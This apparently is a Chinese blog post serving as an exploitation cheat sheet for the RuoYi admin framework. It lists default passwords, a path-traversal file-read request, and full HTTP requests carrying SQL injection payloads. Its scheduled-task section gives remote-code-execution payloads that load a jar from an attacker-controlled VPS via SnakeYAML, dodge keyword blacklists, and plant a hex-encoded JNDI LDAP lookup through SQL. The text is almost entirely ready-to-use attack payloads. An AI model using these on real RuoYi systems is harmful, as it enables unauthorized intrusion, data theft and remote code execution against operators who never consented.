ruoyi漏洞利用

标签：application zh 利用 ruoyi Accept 漏洞 job Sec Fetch

1、ruoyi默认口令

admin/admin123

ruoyi/123456

2、前端shiro反序列化

版本过低，基本不能利用，使用反序列化工具不再过多介绍。

3、任意文件读取 Ruoyi <4.5.1

GET /common/download/resource?resource=/profile/../../../../../../../{filename}

4、SQL注入

4-1、/system/role/list路径

post型

POST /system/role/list HTTP/1.1  
Host: 127.0.0.1  
User-Age  
nt: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Content-Length: 181  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/system/role  
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

GET型

GET /system/role/list?pageSize=10&pageNum=1&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=&params%5BdataScope%5D=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))   HTTP/1.1  
Host: 127.0.0.1  
User-Age  
nt: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Content-Length: 181  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/system/role  
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

4-2、/system/dept/list路径

POST /system/dept/list HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Connection: keep-alive
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Cookie: 
sec-ch-ua-mobile: ?0
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Length: 0

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

5、定时任务

5-1、无限制定时任务利用

在vps配置好exp之后，在定时任务处新建定时任务

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps地址/yaml-payload.jar"]]]]')  

0/10 * * * * ?

5-2、黑名单限制了调用字符串

定时任务屏蔽ldap远程调用

定时任务屏蔽http(s)远程调用

定时任务屏蔽rmi远程调用

org.yaml.snakeyaml.Yaml.load(‘!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [“h’t’t’p’://vps地址/yaml-payload.jar”]]]]’)  

0/10 * * * * ?

5-3、调用类白名单限制

利用 genTableServiceImpl.createTable 方法来修改invoke_target为Jndi payload。

漏洞利用方式：

新建定时任务：

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'NILF' WHERE job_id = 1;')

0/10 * * * * ?

此时若job_id为1的任务“调用目标字符串”为NILF，则说明漏洞存在，则进一步利用。实际攻击payload为：

genTableServiceImpl.createTable("UPDATE sys_job SET invoke_target = \"javax.naming.InitialContext.lookup('ldap://ip:端口/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')\" WHERE job_id = 1;")

但是一般会禁用jndi，对value（javax.naming.InitialContext.lookup('ldap://ip:端口/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')）转换为16进制绕过黑名单限制。最终payload为：

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f3139322e3136382e34342e38343a313338392f446573657269616c697a6174696f6e2f55524c444e532f656b777a6d787479696d2e64677268332e636e2729 WHERE job_id = 1;')

标签：application,zh,利用,ruoyi,Accept,漏洞,job,Sec,Fetch
From： https://www.cnblogs.com/nilf/p/18280005